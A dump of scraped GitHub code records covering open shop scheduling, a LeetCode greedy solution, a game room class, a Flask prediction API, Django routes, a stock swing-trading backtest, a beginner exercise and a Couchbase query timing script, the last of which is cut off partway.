time_interval_list:\n intersection = min(current_machine_available_time + proc_time, times[1]) - max(\n current_machine_available_time, times[0])\n if intersection > 0:\n break # there is an intersection so break the loop\n else:\n # te job fits the time gap and it doesnt have intersection with other\n # operations on other machines therefore schedule it in the time gap\n # current_machine_available_time = times[0]\n flag_break_loop = True\n if flag_break_loop:\n break\n else:\n current_machine_available_time = gantt_chart[machine_number][-1][-1]\n # check if there are no operation of the job on other machines and if there is an\n # intersection delay the current machine available time\n current_machine_available_time = check_intersection(time_interval_list, proc_time,\n current_machine_available_time)\n\n completion_time = current_machine_available_time + proc_time\n gantt_chart[machine_number].append((job_number, current_machine_available_time,\n proc_time, completion_time))\n return gantt_chart\n\n\n# OSSP_GA_OOP.py icinden aldigin class fonksiyonu\ndef gannt_chart3(problem, schedule, flag):\n \"\"\"\n Compiles a scheduling on the machines given a permutation of jobs \n with the option of time gap checking\n \"\"\"\n\n fForceOrder = flag\n fRepair = False\n\n # Note that using [[]] * m would be incorrect, as it would simply\n # copy the same list m times (as opposed to creating m distinct lists).\n\n gantt_chart = [[] for _ in range(problem.numberOfMachines)]\n\n for operation in schedule:\n machine_number = problem.operation_numbers_dictionary[operation][0]\n job_number = problem.operation_numbers_dictionary[operation][1]\n proc_time = problem.processing_times[operation]\n\n # determine the processing times of the job on other machines\n time_interval_list = []\n for machine in range(problem.numberOfMachines):\n # dont check the machine to be scheduled since one job can be scheduled only once.\n # Check other machines if they have operations scheduled before\n if machine != 
machine_number and len(gantt_chart[machine]) != 0:\n for j in range(len(gantt_chart[machine])):\n # check the job numbers on other machines\n # and determine if the machine processed an operation of the job\n # to be scheduled now\n if gantt_chart[machine][j][0] == job_number:\n # put completion times of the job on other machines into a list\n s_time = gantt_chart[machine][j][1] # start time of the job on the other machine\n c_time = gantt_chart[machine][j][-1] # completion time of the job on other machine\n\n time_interval_list.append((s_time, c_time))\n time_interval_list.sort(key=lambda x: x[0]) # sort the list according to start time\n\n # determine the completion time of the last operation (available time) on the required machine\n num_of_jobs_on_current_machine = len(gantt_chart[machine_number])\n\n if not fForceOrder: # eger kromozomdaki makinelere dusen is sirasi gozetilmeyecekse\n # first find the gaps on the machine to be scheduled\n if num_of_jobs_on_current_machine != 0:\n gaps = []\n current_starttime2check = 0\n for op in (gantt_chart[machine_number]):\n if current_starttime2check == op[1]: # if start time equals to the operations start time\n current_starttime2check = op[3] # then update start time to operations end time\n else:\n gap = (current_starttime2check, op[1])\n gaps.append(gap)\n current_starttime2check = op[3]\n\n # if there are gaps on the current machine check if it can be scheduled on those gaps\n if gaps:\n for space in gaps:\n current_machine_available_time = space[0]\n # Narrow the gap by checking other machines\n time_to_schedule = check_overlap_othmach(time_interval_list, proc_time,\n current_machine_available_time)\n\n space = (time_to_schedule, space[1])\n # check if there is an overlap on the current machine\n foverlap = check_overlap_curmach(space, proc_time)\n\n if not foverlap: # if there is no overlap on the current machine\n time_to_schedule = space[0]\n fRepair = True\n break\n else: # if operation doesnt fit in the gap\n # replace the available time with last operation's end time\n current_machine_available_time = gantt_chart[machine_number][-1][-1]\n time_to_schedule = check_overlap_othmach(time_interval_list, proc_time,\n current_machine_available_time)\n\n else: # if there are no gaps\n current_machine_available_time = gantt_chart[machine_number][-1][-1]\n time_to_schedule = check_overlap_othmach(time_interval_list, proc_time,\n current_machine_available_time)\n else:\n current_machine_available_time = 0\n time_to_schedule = check_overlap_othmach(time_interval_list, proc_time, current_machine_available_time)\n else: # keep the order of schedule\n if num_of_jobs_on_current_machine == 0:\n current_machine_available_time = 0\n else: # buradan emin degilim\n current_machine_available_time = gantt_chart[machine_number][-1][-1] # for order enforced case\n time_to_schedule = check_overlap_othmach(time_interval_list, proc_time, current_machine_available_time)\n\n completion_time = time_to_schedule + proc_time\n gantt_chart[machine_number].append((job_number, time_to_schedule,\n proc_time, completion_time))\n gantt_chart[machine_number].sort(key=lambda x: x[1])\n if fRepair:\n repair_chromosome(schedule, gantt_chart, problem)\n return gantt_chart\n\n\ndef check_intersection(time_interval_list, proc_time, current_machine_available_time):\n while True:\n if len(time_interval_list) != 0:\n for times in time_interval_list:\n intersection = min(current_machine_available_time + proc_time, times[1]) - max(\n current_machine_available_time, times[0])\n if 
intersection > 0:\n current_machine_available_time = times[1]\n f_intersection = True\n break\n else:\n f_intersection = False\n else:\n break\n\n if not f_intersection:\n break\n return current_machine_available_time\n\n\ndef check_overlap_othmach(time_interval_list, proc_time, current_machine_available_time):\n if len(time_interval_list) != 0:\n for s_time, c_time in time_interval_list:\n range_set = set(range(current_machine_available_time,\n current_machine_available_time + proc_time + 1))\n overlap = range_set.intersection(set(range(s_time, c_time)))\n if overlap:\n current_machine_available_time = c_time\n\n time_to_schedule = current_machine_available_time\n else:\n time_to_schedule = current_machine_available_time\n\n return time_to_schedule\n\n\ndef check_overlap_curmach(gap, proc_time):\n if gap[1] - gap[0] < proc_time:\n return True\n return False\n\n\ndef repair_chromosome(schedule, gchart, problem):\n elements = problem.numberOfMachines * problem.numberOfJobs\n original = np.empty(elements, dtype=object)\n for i, operation in enumerate(schedule):\n original[i] = problem.operation_numbers_dictionary[operation]\n\n chart = deepcopy(gchart)\n dtype = [('operation', 'object'), ('start_time', 'int'), ('proc_time', 'int'), ('end_time', 'int')]\n chart = np.array(chart, dtype=dtype).flatten()\n\n for i, operation in enumerate(chart):\n machine_number = i // problem.numberOfMachines\n operation = ((machine_number, operation[0]), operation[1], operation[2], operation[3])\n chart[i] = operation\n\n chart = np.sort(chart, order='start_time')\n chart = [list(grp) for k, grp in groupby(chart, key=lambda x: x[1])]\n repaired = list(map(extract, chart))\n indices = {b: i for i, b in enumerate(original)}\n for sublist in repaired:\n if len(sublist) > 1:\n sublist.sort(key=lambda x: indices[x])\n del indices, chart, elements\n repaired = list(chain(*repaired))\n rev_dict = {value: key for key, value in problem.operation_numbers_dictionary.items()}\n repaired = list(map(lambda x: rev_dict[x], repaired))\n return repaired\n\n\ndef extract(sublist):\n if len(sublist) > 1:\n operations = [operation[0] for operation in sublist]\n else:\n operations = [sublist[0][0]]\n return operations\n\n\n# Define Objective Function\ndef makespan(problem, schedule, flag):\n gannt_chrt = gannt_chart3(problem, schedule, flag)\n ctimes = []\n for machine in range(problem.numberOfMachines):\n ctimes.append(gannt_chrt[machine][-1][-1])\n make_span = max(ctimes)\n return gannt_chrt, make_span # return a tuple for compatibility\n\n\ndef plot_gannt(machine_times, problem, ms):\n \"\"\"\n Plots the gannt chart of the given gannt chart data structure\n :param machine_times: gannt chart data structure\n :param ms: makespan value\n :return: None \n \"\"\"\n fig, ax = plt.subplots()\n facecolors = ('blue', 'red', 'yellow', 'green', 'grey', 'azure', 'plum',\n 'wheat', 'brown', 'chocolate', 'coral', 'cyan', 'darkblue',\n 'gold', 'khaki', 'lavender', 'lime', 'magenta', 'orange',\n 'pink')\n bar_start = 10\n bar_width = 9\n increment = 10\n for i in range(problem.numberOfMachines):\n for j in range(problem.numberOfJobs):\n datalist = [machine_times[i][j][1:3]]\n ax.broken_barh(datalist, (bar_start, bar_width),\n facecolors=facecolors[machine_times[i][j][0]])\n bar_start += increment\n\n ax.set_ylim(5, 115)\n ax.set_xlim(0, ms)\n ytickpos = range(15, 85, 10)\n ax.set_yticks(ytickpos)\n yticklabels = ['Machine ' + str(i + 1) for i in range(problem.numberOfMachines)]\n ax.set_yticklabels(yticklabels)\n ax.grid(True)\n\n fakeredbar = 
mpatch.Rectangle((0, 0), 1, 1, fc=\"r\")\n fakebluebar = mpatch.Rectangle((0, 0), 1, 1, fc=\"b\")\n fakeyellowbar = mpatch.Rectangle((0, 0), 1, 1, fc=\"y\")\n fakegreenbar = mpatch.Rectangle((0, 0), 1, 1, fc=\"green\")\n fakegreybar = mpatch.Rectangle((0, 0), 1, 1, fc=\"grey\")\n fakeazurebar = mpatch.Rectangle((0, 0), 1, 1, fc='azure')\n fakeplumbar = mpatch.Rectangle((0, 0), 1, 1, fc='plum')\n\n plt.legend([fakebluebar, fakeredbar, fakeyellowbar, fakegreenbar, fakegreybar, fakeazurebar, fakeplumbar],\n ['Job1', 'Job2', 'Job3', 'Job4', 'Job5', 'Job6', 'Job7'])\n plt.show()\n\n\ndef main():\n # random.seed(1250)\n ossp_problem = Problem(filename='instances/Openshop/tai4_4.txt', instance=1)\n schedule = np.array([12, 0, 7, 2, 6, 3, 13, 5, 1, 4, 14, 11, 10, 15, 8, 9])\n # schedule = np.array([12, 7, 2, 11, 6, 1, 0, 13, 9, 5, 14, 3, 10, 15, 4, 8]) #repaired\n fForceOrder = False\n print(schedule)\n gchart, ms = makespan(ossp_problem, schedule, fForceOrder)\n\n for idx, machine in enumerate(gchart):\n print('Machine ' + str(idx), ' :', machine)\n print(ms)\n plot_gannt(gchart, ossp_problem, ms)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tugyanalper/OSSPPy","sub_path":"scratchpad.py","file_name":"scratchpad.py","file_ext":"py","file_size_in_byte":26943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
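The scheduling rule all three gannt_chart variants above enforce is that an operation must wait while any interval of the same job runs on another machine. A stripped-down sketch of that delay step (intervals are (start, end) tuples; a single pass over start-sorted intervals suffices because the candidate start time only moves forward):

```python
def earliest_start(busy_intervals, proc_time, t):
    # Push candidate start t past every interval that would overlap [t, t + proc_time).
    for s, e in sorted(busy_intervals):
        if t < e and s < t + proc_time:  # half-open overlap test
            t = e
    return t

print(earliest_start([(0, 3), (5, 8)], proc_time=2, t=2))  # 3: fits in the 3-5 gap
print(earliest_start([(0, 3), (5, 8)], proc_time=3, t=2))  # 8: the gap is too small
```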
+{"seq_id":"74674874322","text":"class Solution:\n def maxIceCream(self, costs: List[int], coins: int) -> int:\n freq = defaultdict(int)\n for c in costs:\n freq[c] += 1\n\n result = 0\n # least expensive first\n for f in sorted(freq):\n if f > coins:\n break\n # greedy: take as much as possible / available\n take = min(coins // f, freq[f])\n coins -= take * f\n result += take\n return result\n","repo_name":"stbrumme/leetcode","sub_path":"1833.py","file_name":"1833.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"30117512337","text":"from __future__ import annotations\n\nfrom pygame import Vector2\nfrom typing import TYPE_CHECKING, Optional\n\nfrom ..facilityroom import DMFacilityRoom\nfrom utilities import UnlockPack, Effect\n\nif TYPE_CHECKING:\n from dm.core.contexts import AttackContext\n from dm.core.game.game import DMGame\n################################################################################\n\n__all__ = (\"SpecialOpsRoom\",)\n\n################################################################################\nclass SpecialOpsRoom(DMFacilityRoom):\n\n def __init__(self, game: DMGame, position: Optional[Vector2] = None, level: int = 1):\n\n super().__init__(\n game, position,\n _id=\"ROOM-190\",\n name=\"Special Ops Room\",\n description=(\n \"Increases damage inflicted to enemies by adjacent traps \"\n \"by {value} %.\"\n ),\n level=level,\n rank=5,\n unlock=UnlockPack.Advanced,\n effects=[\n Effect(name=\"scalar\", base=30, per_lv=2),\n ]\n )\n\n################################################################################\n def handle(self, ctx: AttackContext) -> None:\n\n if ctx.source in self.adjacent_rooms:\n ctx.amplify_pct(self.effects[\"scalar\"])\n\n################################################################################\n","repo_name":"AllegroVivo/DungeonDefense","sub_path":"dm/rooms/FiveStar/SpecialOpsRoom.py","file_name":"SpecialOpsRoom.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"30099986906","text":"#!/usr/local/bin/python3\n\"\"\"\nSuppose the following records as records appended from anonymous fns.\n\"\"\"\nimport typing\nimport json\n\n\nclass State:\n epochs: int\n tvl: int\n\n def __init__(self):\n self.epochs = 0\n self.tvl = 0\n\n\nclass TvlT:\n epochs: int\n\n def __init__(self):\n self.epoch = 0\n self.tvl_sum = 0\n\n\n\"\"\"\nbucket_tvl_t: {\n \"state_epochs\": {\n \"tvl\": 0,\n \"epoch\": 1648857973,\n }\n}\n\"\"\"\nbucket_tvl_t: typing.Dict = {}\nbucket_tvl_over_t: typing.List = [\n {\n \"sum\": 50,\n \"epoch\": 151,\n },\n {\n \"sum\": 500,\n \"epoch\": 261,\n },\n {\n \"sum\": 590,\n \"epoch\": 301,\n },\n {\n \"sum\": 690,\n \"epoch\": 404,\n },\n {\n \"sum\": 710,\n \"epoch\": 503,\n },\n {\n \"sum\": 850,\n \"epoch\": 690,\n },\n {\n \"sum\": 950,\n \"epoch\": 710,\n },\n]\n\n\nif __name__ == \"__main__\":\n state = State()\n for tvl_epoch in bucket_tvl_over_t:\n state.tvl += tvl_epoch[\"sum\"]\n bucket_tvl_t[f\"{state.epochs}\"] = {\n \"tvl\": state.tvl,\n \"epoch\": tvl_epoch[\"epoch\"],\n }\n print(f\"tvl bucket - epoch: {state.epochs}\", state.tvl)\n state.epochs += 1\n\n latest_tvl = json.dumps(\n bucket_tvl_t[f\"{state.epochs-1}\"], default=lambda x: x.__dict__, indent=\" \"\n )\n historical_tvl = json.dumps(bucket_tvl_t, default=lambda x: x.__dict__, indent=\" \")\n print(historical_tvl, \"\", f\"latest - {latest_tvl}\", sep=\"\\n\")\n\n for i in range(0, state.epochs):\n t_tvl = json.dumps(\n bucket_tvl_t[f\"{i}\"], default=lambda x: x.__dict__, indent=\" \"\n )\n print(i, t_tvl)\n\n state_json = json.dumps(state, default=lambda x: x.__dict__, indent=\" \")\n print(state_json)\n\n","repo_name":"whymidnight/Terra-Native-Token-Staking","sub_path":"contracts/market/utils/queries/tvl_over_time.py","file_name":"tvl_over_time.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"25119223260","text":"from flask import Flask, request\nfrom flask_restx import Resource, Api, fields\nimport joblib\n\napp = Flask(__name__)\napi = Api(app)\n\nns = api.namespace('health_charges', description='Health Insurance Charges')\n\ncustomer = api.model('customer', {\n 'age': fields.Integer(required=True, description='Age'),\n 'gender_code': fields.Integer(required=True, description='Gender Code - 0: F, 1: M'),\n 'bmi': fields.Float(required=True, description='BMI'),\n 'children': fields.Integer(required=True, description='Number of children'),\n 'smoker_code': fields.Integer(required=True, description='Smoker Code - 0: No, 1: Yes')\n })\n\nmodel = joblib.load('health_charges_classifier_model.joblib')\n\n@ns.route('/')\nclass Review(Resource):\n def get(self):\n return {'response': 'health charges classifier is running'}\n\n @ns.expect(customer)\n def post(self):\n print('payload:')\n print(api.payload)\n\n prediction = model.predict_proba([[api.payload['age'],\n api.payload['gender_code'],\n api.payload['bmi'],\n api.payload['children'],\n api.payload['smoker_code']]])[0]\n print('prediction: ' + str(prediction))\n\n max_prob = max(prediction)\n class_idx = list(prediction).index(max_prob)\n\n return {'customer': api.payload,\n 'class': class_idx,\n 'probability': max_prob}\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=8080)\n","repo_name":"fcallaly/sklearn-health-charges","sub_path":"app/flask_health_charges.py","file_name":"flask_health_charges.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"36834130384","text":"\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"cadastro\", views.CadastroFormView.as_view(), name=\"cadastro\"),\n path(\"generos\", views.generos, name=\"generos\"),\n path(\"leitura\", views.PostListView.as_view(), name=\"leitura\"), #renderizando a view como ListView\n # path(\"entrar\", views.entrar, name=\"entrar\"),\n path(\"accounts/\", include(\"django.contrib.auth.urls\")),\n path(\"cadastro\", views.sair),\n path(\"post//\", views.PostDetailView.as_view(), name=\"detalhes\"), #view para uma coisa\n]#tbm pode ser feito com int:pk, se eu quiser usar chave primária","repo_name":"Dargouls/eBookReader-Django","sub_path":"Booper/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"28228715469","text":"\"\"\"Convert model to response.\"\"\"\nfrom app.api.database.models.user import UserSchema\n\n\ndef convert_user_model_to_response(user: UserSchema):\n \"\"\"Convert user model for response.\"\"\"\n return {\n \"userID\": user.userID,\n \"userName\": user.username,\n \"role\": user.role,\n \"createAt\": user.createAt,\n \"updateAt\": user.updateAt,\n }\n","repo_name":"khanh41/fastapi-mongodb-base-project","sub_path":"{{cookiecutter.project_slug}}/app/api/responses/model2reponse.py","file_name":"model2reponse.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"}
+{"seq_id":"26193819154","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 16 12:18:09 2021\r\n\r\n@author: Sahil\r\n\"\"\"\r\n\r\n#importing packages\r\nimport pandas as pd\r\nimport numpy as np\r\nimport datetime as dt\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import mstats\r\nimport pickle\r\n\r\n#from hidden_markov_model import get_volatility\r\nfrom helpers import *\r\n\r\npd.options.display.max_columns = None\r\npd.options.display.max_rows = None\r\n\r\nclusters_df = pd.read_csv('./files/clusters/clusters.csv')\r\nclusters_df = clusters_df[['Cluster','Companies','NIFTY_INDEX']]\r\n\r\nall_data = pd.read_csv('./files/all_stock_data_with_indicators.csv')\r\nall_data.Date = pd.to_datetime(all_data.Date)\r\nall_data = all_data.set_index('Date')\r\n\r\nall_data['Close_Shifted'] = all_data.groupby('symbol')['Close'].transform(lambda x: x.shift(-19))\r\nall_data['Target'] = ((all_data['Close_Shifted'] - all_data['Open'])/(all_data['Open']) * 100).shift(-1)\r\nall_data['Target_Direction'] = np.where(all_data['Target']>0,1,0)\r\nall_data = all_data.dropna().copy() \r\n\r\n\r\nTarget_variables = ['SMA_ratio','ATR_5','ATR_15','ATR_Ratio',\r\n 'ADX_5','ADX_15','SMA_Volume_Ratio','Stochastic_5','Stochastic_15','Stochastic_Ratio',\r\n 'RSI_5','RSI_15','RSI_ratio','MACD']\r\n\r\nfor variable in Target_variables:\r\n all_data.loc[:,variable] = mstats.winsorize(all_data.loc[:,variable], limits = [0.1,0.1])\r\n\r\n\r\ntrain_data = all_data.loc[:'2018-12-31',]\r\ntest_data = all_data.loc['2019-01-01':]\r\n\r\n\r\n# to test individual helper functions \r\ntest_df = pd.DataFrame()\r\n#test_df_trend = get_trend_slope(test_df) \r\n#test_df_buy_value = get_buy_value(test_df)\r\n#est_df_stoploss = cut_losses_at(0.05,test_df_buy_value)\r\n#est_list_levels = get_levels('ACC.NS','2019-01-01')\r\n\r\n#test_df_get_nearest_support_resistance = get_nearest_support_resistance(test_df)\r\n#test_df_risk_reward = get_risk_reward(test_df_get_nearest_support_resistance)\r\n#test_df_execute_trade = execute_trade_with_levels(test_df_risk_reward)\r\n#test_df_index_change = get_index_change(test_df)\r\n\r\n# -----------------------------------------------TESTING----------------------------------\r\n\r\n\r\n# isoweekday: Monday is 1 and Sunday is 7\r\ntrading_holidays= ['04-03-2019','21-03-2019','17-04-2019','19-04-2019','20-04-2019','01-05-2019','05-06-2019','12-08-2019','15-08-2019','02-09-2019','10-09-2019','02-10-2019','08-10-2019','21-10-2019','28-10-2019','12-11-2019','25-12-2019','21-02-2020','10-03-2020','02-Apr-2020','06-Apr-2020','10-04-2020','14-04-2020','01-05-2020','25-05-2020','02-10-2020','16-11-2020','30-11-2020','25-12-2020','26-01-2021','11-03-2021','20-03-2021','02-04-2021','14-04-2021','21-04-2021','13-05-2021','21-07-2021','19-08-2021','10-09-2021','15-10-2021','04-11-2021','05-11-2021','19-11-2021']\r\nstart_date = dt.date(2021, 1, 1)\r\nend_date = dt.date(2021, 4, 14)\r\ndays = end_date - start_date\r\nvalid_date_list = {(start_date + dt.timedelta(days=x)).strftime('%d-%m-%Y')\r\n for x in range(days.days+1)\r\n if (start_date + dt.timedelta(days=x)).isoweekday() <= 5}\r\n\r\nvalid_date_list = list(valid_date_list)\r\nfor d in trading_holidays:\r\n try:\r\n valid_date_list.remove(d)\r\n except:\r\n continue\r\n\r\n\r\nvalid_date_list.sort(key = lambda date: dt.datetime.strptime(date, '%d-%m-%Y'))\r\nprint(\"Trading Days = {}\".format(sorted(valid_date_list)))\r\nnumber_of_trades = int(len(valid_date_list))\r\nprint('Number of possible trading days : 
',number_of_trades)\r\n\r\n\r\n\r\nstockCounter = pd.DataFrame()\r\nrisk_reward_ratio = 1.5\r\nTradeBook = pd.DataFrame(columns=['Date','exit_date','Companies','Status','buy_value','sell_value','pct_change_trade','risk_reward_ratio'])\r\n\r\nmodel_pred_result_raw = pd.DataFrame(columns=['Date','Companies','buy_value','pct_change_trade'])\r\nfor i in range(0,int(len(valid_date_list))):\r\n    Trade_Date = dt.datetime.strptime(valid_date_list[i], '%d-%m-%Y').strftime('%Y-%m-%d')\r\n    day_data = test_data.loc[Trade_Date]\r\n\r\n    pred_for_tomorrow = pd.DataFrame({'Date':[],\r\n                                  'Companies':[],\r\n                                  'prediction':[]})\r\n\r\n    #Predict each stock using the 2nd January Data\r\n    for cluster_selected in clusters_df.Cluster.unique():\r\n        rf_cv = pickle.load(open(f'./files/clusters/Cluster_{cluster_selected}', 'rb'))\r\n        best_rf = rf_cv.best_estimator_\r\n        cluster_data = day_data.loc[day_data.symbol.isin(clusters_df.loc[clusters_df.Cluster==cluster_selected,'Companies'].tolist())].copy()\r\n        cluster_data = cluster_data.dropna()\r\n        if (cluster_data.shape[0]>0):\r\n            X_test = cluster_data.loc[:,Target_variables]\r\n            \r\n            pred_for_tomorrow = pred_for_tomorrow.append(pd.DataFrame({'Date':cluster_data.index,\r\n                                                                   'Companies':cluster_data['symbol'],\r\n                                                                   'prediction':best_rf.predict_proba(X_test)[:,1]}), ignore_index = True)\r\n    top_10_pred = pred_for_tomorrow.sort_values(by = ['prediction'], ascending = False).head(10)\r\n    top_10_pred.reset_index(drop=True,inplace = True)\r\n    top_10_pred['NIFTY_INDEX'] = top_10_pred.merge(clusters_df[['NIFTY_INDEX','Companies']],how='left', on='Companies')['NIFTY_INDEX']\r\n    \r\n    #top_10_pred = pred_for_tomorrow[pred_for_tomorrow['prediction'] >= 0.65].copy()\r\n    \r\n    \r\n    \r\n    \r\n    for selected_company in top_10_pred['Companies']:\r\n        actual = all_data[all_data.symbol == selected_company].loc[Trade_Date,'Target_Direction']\r\n        pct_change = all_data[all_data.symbol == selected_company].loc[Trade_Date,'Target']\r\n        top_10_pred.loc[top_10_pred['Companies'] == selected_company,'actual'] = actual\r\n        top_10_pred.loc[top_10_pred['Companies'] == selected_company,'pct_change_trade'] = pct_change\r\n    \r\n    test_df = top_10_pred    \r\n    \r\n    top_10_pred = get_buy_value(top_10_pred.copy())    \r\n    top_10_pred = get_nearest_support_resistance(top_10_pred.copy(),False)\r\n    top_10_pred = get_risk_reward(top_10_pred.copy())\r\n    top_10_pred = get_index_change(top_10_pred.copy())   \r\n    \r\n    \r\n    #before filtering, keep the raw prediction\r\n    model_pred_result_raw = model_pred_result_raw.append(top_10_pred[['Date','Companies','buy_value','pct_change_trade','risk_reward_ratio']])\r\n    model_pred_result_raw = model_pred_result_raw[model_pred_result_raw.risk_reward_ratio >= risk_reward_ratio]\r\n    \r\n    top_10_pred = top_10_pred[top_10_pred.risk_reward_ratio >= risk_reward_ratio]    \r\n    top_10_pred = top_10_pred[top_10_pred['1WRC'] >= top_10_pred['NIFTY50_1WRC']]\r\n    \r\n    \r\n    #executing the trade; not used in production\r\n    top_10_pred = execute_trade_with_levels(top_10_pred.copy())\r\n    \r\n    \r\n    try:\r\n        \r\n        print(top_10_pred[['Date','exit_date','Companies','prediction','Status','buy_value','pct_change_trade','risk_reward_ratio','NIFTY_INDEX','3DRC','1WRC']])\r\n        if len(top_10_pred) == 0:\r\n            raise Exception(\"Sorry, no trades\")\r\n        \r\n        TradeBook = TradeBook.append(top_10_pred[['Date','exit_date','Companies','Status','buy_value','sell_value','pct_change_trade','risk_reward_ratio']],ignore_index=True)\r\n    except:\r\n        continue\r\n    \r\nplt.plot(TradeBook['pct_change_trade'])\r\nnet_profit_loss = 
((TradeBook.sell_value.sum()-TradeBook.buy_value.sum())/TradeBook.buy_value.sum())*100\r\nplt.ylabel('Returns')\r\nplt.xlabel(f'Trades Net profit/loss: {net_profit_loss} with risk:reward of 1:{risk_reward_ratio}')\r\nplt.title(f'Trades from {start_date} to {end_date}')\r\n\r\n\r\n\r\nprint('----------Trade result with model recommendation and custom filtering-------------')\r\nprint('Number of Trades: ',len(TradeBook))\r\nprint(\"Net Profit/Loss: \",net_profit_loss)\r\nprint(TradeBook.buy_value.sum(),TradeBook.sell_value.sum())\r\n\r\n\r\nmodel_pred_result_raw = model_pred_result_raw.reset_index(drop=True)\r\nmodel_pred_result_raw['sell_value'] = model_pred_result_raw['buy_value'] + ((model_pred_result_raw['pct_change_trade']/100)*model_pred_result_raw['buy_value'])\r\nnet_profit_loss = ((model_pred_result_raw.sell_value.sum()-model_pred_result_raw.buy_value.sum())/model_pred_result_raw.buy_value.sum())*100\r\nprint('----------Trade result with model recommendation (RAW)-------------')\r\nprint('Number of Trades: ',len(model_pred_result_raw))\r\nprint(\"Net Profit/Loss: \",net_profit_loss)\r\nprint(model_pred_result_raw['buy_value'].sum(),model_pred_result_raw['sell_value'].sum())\r\n\r\n#plt.plot(model_pred_result_raw['pct_change_trade'])\r\n#net_profit_loss = ((model_pred_result_raw.sell_value.sum()-model_pred_result_raw.buy_value.sum())/model_pred_result_raw.buy_value.sum())*100\r\n#plt.ylabel('Returns')\r\n#plt.xlabel(f'Trades Net profit/loss: {net_profit_loss} risk:reward of 1:{risk_reward_ratio}')\r\n#plt.title(f'Trades from {start_date} to {end_date}')\r\n\r\nTradeBook.to_csv('./files/clusters/tradebook.csv')\r\n    \r\n\r\n","repo_name":"kgsahil/Swing-Trade-Equity","sub_path":"rf_model_test.py","file_name":"rf_model_test.py","file_ext":"py","file_size_in_byte":8878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
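All of the profit figures in the record above reduce to one relation: sell_value scales buy_value by the trade's percentage change, and net P/L is the aggregate return over the book. A small worked check of that arithmetic (toy numbers, not the backtest's output):

```python
import pandas as pd

book = pd.DataFrame({"buy_value": [100.0, 200.0],
                     "pct_change_trade": [5.0, -2.0]})
book["sell_value"] = book["buy_value"] * (1 + book["pct_change_trade"] / 100)
net = (book["sell_value"].sum() - book["buy_value"].sum()) / book["buy_value"].sum() * 100
print(round(net, 4))  # 0.3333 -> (105 + 196 - 300) / 300 * 100
```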
+{"seq_id":"75330182482","text":"\"\"\"\n85. Crie um programa onde o usuário possa digitar sete valores numéricos e cadastre-os em uma lista única que mantenha separados os valores pares e ímpares. No final, mostre os valores pares e ímpares em ordem crescente.\n\n\"\"\"\nnum = [[], []] # adicionando duas listas, a primeira é par e a outra ímpar\nvalor = 0\nfor c in range(1, 8):\n valor = int(input(f'Digite o {c}º valor:'))\n if valor % 2 == 0:\n num[0].append(valor) # adiciona na lista par\n else:\n num[1].append(valor) # adiciona na lista ímpar\nnum[0].sort()\nnum[1].sort()\nprint(f'Os valores pares digitados foram: {num[0]}')\nprint(f'Os valores ímpares digitado foram: {num[1]}')\n","repo_name":"luiz-educosta/Estudando_Python","sub_path":"estudandopython/Exercicios_curso_em_video/curso_python/85.py","file_name":"85.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"18255543164","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n####\n# Couchbase\n####\n\nimport couchbase\nfrom couchbase.cluster import Cluster\nfrom couchbase.cluster import PasswordAuthenticator\nfrom couchbase.n1ql import N1QLQuery\n\n# login\n\ncluster = Cluster('couchbase://silverhill.fbi.h-da.de')\nauthenticator = PasswordAuthenticator('prak21', 'prak21')\ncluster.authenticate(authenticator)\ncb = cluster.open_bucket('prak21')\ncb.n1ql_timeout = 3600\n\n# analyze functions\n\n\ndef cb_index_create():\n q1 = 'create index movieIds on prak21(movieId);'\n q2 = 'create index titles on prak21(title);'\n query_result(q1)\n query_result(q2)\n\n\ndef cb_index_drop():\n q1 = N1QLQuery('drop index prak21.movieIds;')\n q2 = N1QLQuery('drop index prak21.titles;')\n try:\n cb.n1ql_query(q1).execute()\n except couchbase.exceptions.HTTPError:\n pass\n try:\n cb.n1ql_query(q2).execute()\n except couchbase.exceptions.HTTPError:\n pass\n\n\ndef query_result(string_query):\n q = N1QLQuery(string_query)\n q.timeout = 3600\n qres = cb.n1ql_query(q)\n for row in qres:\n print(row)\n\n\ndef query_time(string_query, repetitions):\n times = []\n q = N1QLQuery(string_query)\n q.timeout = 3600\n for _ in range(repetitions):\n qres = cb.n1ql_query(q).execute()\n time = qres.metrics['executionTime']\n # extract time we get times like 'x.xxs' or 'x.xxms'\n # s is seconds, ms is milliseconds\n format_letter = time[-2]\n if format_letter == 'm':\n times.append(round(float(time[:-2]), 2))\n else:\n times.append(round(float(time[:-1]) * 1000, 2))\n times = np.array(times)\n time_avg = np.round(np.mean(times), 0)\n time_std = np.round(np.std(times), 0)\n return(time_avg, time_std)\n\n####\n# Aufgabe 1\n####\n\n\n# run queries and collect times\nn = 5\nq1 = \"select title from prak21 where title like '%Matrix%';\"\nq2 = \"select ratings from prak21 where movieId = 6365;\"\nq3 = \"select title, ratings from prak21 where movieId = 6365;\"\ncb_index_drop()\nt1, std1 = query_time(q1, n)\nt2, std2 = query_time(q2, n)\nt3, std3 = query_time(q3, n)\ntimes_noidx = np.array([t1, t2, t3])\nstd_noidx = np.array([std1, std2, 